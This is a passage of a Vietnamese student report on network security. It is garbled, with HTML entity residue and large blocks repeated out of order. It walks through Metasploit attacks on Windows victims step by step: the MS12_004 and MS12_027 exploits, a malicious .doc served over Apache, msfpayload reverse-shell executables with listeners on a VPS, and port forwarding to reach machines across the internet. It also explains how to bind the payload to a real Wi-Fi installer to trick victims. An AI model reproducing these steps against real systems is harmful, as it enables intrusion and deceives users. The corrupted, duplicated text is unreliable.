ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
36
Sau khi hệ thống tigravem ra đường dẫn của module matilde lỗi ms12_004 Ta ghi nhớ đường dẫn
sau đoacute dugraveng lệnh ldquouse [đường dẫn]rdquo để bắt đầu sử dụng
37
Dugraveng lệnh ldquoShow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Tiếp theo thiết lập caacutec thocircng số cần thiết bằng caacutec lệnh
- Set SRVHOST [ip maacutey Backtrack]
- Set LHOST [ip maacutey BackTrack]
- Set payload windowsmeterpreterreverse_tcp
38
Cuốt cugraveng gotilde lệnh ldquo Exploitrdquo để bắt đầu khai thaacutec lỗi
Luacutec nagravey maacutey BackTrack sẽ tạo ra 1 đương link Khi maacutey XP truy cập vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
39
Trecircn maacutey XP mở trigravenh duyệt IE vagrave truy cập vagraveo đường link đoacute
Ngay lập tức maacutey BackTrac sẽ gửi caacutec đoạn matilde độc để xacircm nhập dựa vagraveo lỗ hổng
40
Khi maacutey Backtrack thocircng baacuteo đatilde coacute 1 phiecircn kết nối thigrave luacutec đoacute ta đatilde coacute thể xacircm nhập vagraveo
maacutey nạn nhacircn
Dugraveng lệnh ldquosessionsrdquo để kiểm tra thocircng tin phiecircn kết nối
41
Tiếp theo dugraveng lệnh ldquosession ndashI [ID của phiecircn kết nối]rdquo để xacircm nhập vagraveo maacutey nạn
nhacircn
Tới đacircy ta đatilde coacute thể lagravem chủ hệ thống của maacutey nạn nhacircn
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
42
Thử tạo 1 thư mục coacute tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Ngay lập tức trecircn magraven higravenh maacutey XP sẽ coacute thư mục ldquotrungrdquo
43
Như vậy ta đatilde hoagraven thagravenh khai thaacutec matilde lỗi ms12_004
2254 LỖI MS12_027
Lỗi MS12_027 lagrave lỗi magrave thocircng qua bộ cocircng cụ Office hacker sẽ tấn cocircng vagraveo hệ thống vagrave
chiếm quyền điều khiển Trong caacutec phiecircn bản Office phổ biến (từ 2003 2007 2010) đều diacutenh
lỗ hổng nagravey
Bắt đầu quaacute trigravenh tấn cocircng Ta khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo trecircn
Backtrack
44
Dugraveng lệnh ldquosearch ms12_027rdquo để tigravem module của matilde lỗi trong Metasploit
Sau khi coacute đường dẫn của module Dugraveng lệnh ldquo use [đường dẫn module]rdquo để sử dụng
45
Gotilde lệnh ldquo Show optionsrdquo để xem những thuộc tiacutenh cần thiết lập
Cần tạo 1 file giả coacute định dạng doc để lagravem cocircng cụ xacircm nhập maacutey nạn nhacircn
Dugraveng lệnh ldquo Set filename [ten file]docrdquo
46
Tiếp đoacute lần lượt gotilde lệnh
- ldquoSet payload windowsmeterpreterreverse_tcprdquo thiết lập payload của
module
- ldquoSet LHOST [ip maacutey Backtrack]rdquo Thiết lập ip maacutey lắng nghe
Sau đoacute gotilde lệnh ldquoExploitrdquo để hoagraven thagravenh việc thiết lập thocircng tin vagrave tạo file giả
47
Maacutey Backtrack luacutec nagravey sẽ tạo ra file doc vagrave thocircng baacuteo đường dẫn file được tạo ra
Kế tiếp ta cần thiết lập 1 trigravenh lắng nghe vagrave điều khiển maacutey nạn nhacircn ( sau khi maacutey nạn
nhacircn bị nhiễm matilde độc trong file doc)
Dugraveng lệnh ldquouse exploitmultihandlerrdquo
48
Sau đoacute thiết lập caacutec thocircng số
- ldquoSet payload windowsmeterpreterreverse_tcprdquo
- ldquoSet LHOST [ip maacutey Backtrack]rdquo
Sau đoacute dugraveng lệnh ldquoExploitrdquo để bắt đầu lắng nghe vagrave thiết lập phiecircn kết nối với maacutey nạn
nhacircn để xacircm nhập ngay khi maacutey nạn nhacircn bị nhiễm matilde độc khi mở file doc
Tới đacircy đatilde hoagraven tất việc thiết lập vagrave triển khai xacircm nhập Giờ ta sẽ chờ maacutey nạn nhacircn bị
49
nhiễm matilde độc Caacutech dễ nhất lagrave đưa file doc lecircn trigravenh duyệt web để nạn nhacircn tải về
Copy file doc được tạo vagraveo thư mục varwww Mở console khaacutec lecircnh gotilde lệnh
ldquocp [đường dẫn tới file doc] varwwwrdquo
Sau đoacute triển khai web server bằng lệnh
ldquoetcinitdapache 2 startrdquo
Từ maacutey XP truy cập vagraveo địa chỉ ldquo http[ip maacutey backtrack][file doc]rdquo 1 cửa sổ ldquo file
downloadrdquo hiện ra
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
37
Dugraveng lệnh ldquoShow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Tiếp theo thiết lập caacutec thocircng số cần thiết bằng caacutec lệnh
- Set SRVHOST [ip maacutey Backtrack]
- Set LHOST [ip maacutey BackTrack]
- Set payload windowsmeterpreterreverse_tcp
38
Cuốt cugraveng gotilde lệnh ldquo Exploitrdquo để bắt đầu khai thaacutec lỗi
Luacutec nagravey maacutey BackTrack sẽ tạo ra 1 đương link Khi maacutey XP truy cập vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
39
Trecircn maacutey XP mở trigravenh duyệt IE vagrave truy cập vagraveo đường link đoacute
Ngay lập tức maacutey BackTrac sẽ gửi caacutec đoạn matilde độc để xacircm nhập dựa vagraveo lỗ hổng
40
Khi maacutey Backtrack thocircng baacuteo đatilde coacute 1 phiecircn kết nối thigrave luacutec đoacute ta đatilde coacute thể xacircm nhập vagraveo
maacutey nạn nhacircn
Dugraveng lệnh ldquosessionsrdquo để kiểm tra thocircng tin phiecircn kết nối
41
Tiếp theo dugraveng lệnh ldquosession ndashI [ID của phiecircn kết nối]rdquo để xacircm nhập vagraveo maacutey nạn
nhacircn
Tới đacircy ta đatilde coacute thể lagravem chủ hệ thống của maacutey nạn nhacircn
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
42
Thử tạo 1 thư mục coacute tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Ngay lập tức trecircn magraven higravenh maacutey XP sẽ coacute thư mục ldquotrungrdquo
43
Như vậy ta đatilde hoagraven thagravenh khai thaacutec matilde lỗi ms12_004
2254 LỖI MS12_027
Lỗi MS12_027 lagrave lỗi magrave thocircng qua bộ cocircng cụ Office hacker sẽ tấn cocircng vagraveo hệ thống vagrave
chiếm quyền điều khiển Trong caacutec phiecircn bản Office phổ biến (từ 2003 2007 2010) đều diacutenh
lỗ hổng nagravey
Bắt đầu quaacute trigravenh tấn cocircng Ta khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo trecircn
Backtrack
44
Dugraveng lệnh ldquosearch ms12_027rdquo để tigravem module của matilde lỗi trong Metasploit
Sau khi coacute đường dẫn của module Dugraveng lệnh ldquo use [đường dẫn module]rdquo để sử dụng
45
Gotilde lệnh ldquo Show optionsrdquo để xem những thuộc tiacutenh cần thiết lập
Cần tạo 1 file giả coacute định dạng doc để lagravem cocircng cụ xacircm nhập maacutey nạn nhacircn
Dugraveng lệnh ldquo Set filename [ten file]docrdquo
46
Tiếp đoacute lần lượt gotilde lệnh
- ldquoSet payload windowsmeterpreterreverse_tcprdquo thiết lập payload của
module
- ldquoSet LHOST [ip maacutey Backtrack]rdquo Thiết lập ip maacutey lắng nghe
Sau đoacute gotilde lệnh ldquoExploitrdquo để hoagraven thagravenh việc thiết lập thocircng tin vagrave tạo file giả
47
Maacutey Backtrack luacutec nagravey sẽ tạo ra file doc vagrave thocircng baacuteo đường dẫn file được tạo ra
Kế tiếp ta cần thiết lập 1 trigravenh lắng nghe vagrave điều khiển maacutey nạn nhacircn ( sau khi maacutey nạn
nhacircn bị nhiễm matilde độc trong file doc)
Dugraveng lệnh ldquouse exploitmultihandlerrdquo
48
Sau đoacute thiết lập caacutec thocircng số
- ldquoSet payload windowsmeterpreterreverse_tcprdquo
- ldquoSet LHOST [ip maacutey Backtrack]rdquo
Sau đoacute dugraveng lệnh ldquoExploitrdquo để bắt đầu lắng nghe vagrave thiết lập phiecircn kết nối với maacutey nạn
nhacircn để xacircm nhập ngay khi maacutey nạn nhacircn bị nhiễm matilde độc khi mở file doc
Tới đacircy đatilde hoagraven tất việc thiết lập vagrave triển khai xacircm nhập Giờ ta sẽ chờ maacutey nạn nhacircn bị
49
nhiễm matilde độc Caacutech dễ nhất lagrave đưa file doc lecircn trigravenh duyệt web để nạn nhacircn tải về
Copy file doc được tạo vagraveo thư mục varwww Mở console khaacutec lecircnh gotilde lệnh
ldquocp [đường dẫn tới file doc] varwwwrdquo
Sau đoacute triển khai web server bằng lệnh
ldquoetcinitdapache 2 startrdquo
Từ maacutey XP truy cập vagraveo địa chỉ ldquo http[ip maacutey backtrack][file doc]rdquo 1 cửa sổ ldquo file
downloadrdquo hiện ra
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
